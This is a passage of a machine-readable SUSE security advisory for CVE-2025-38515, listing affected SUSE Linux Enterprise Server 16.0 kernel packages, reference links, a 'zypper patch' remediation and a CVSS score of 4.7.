"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38515",
"url": "https://www.suse.com/security/cve/CVE-2025-38515"
},
{
"category": "external",
"summary": "SUSE Bug 1248212 for CVE-2025-38515",
"url": "https://bugzilla.suse.com/1248212"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
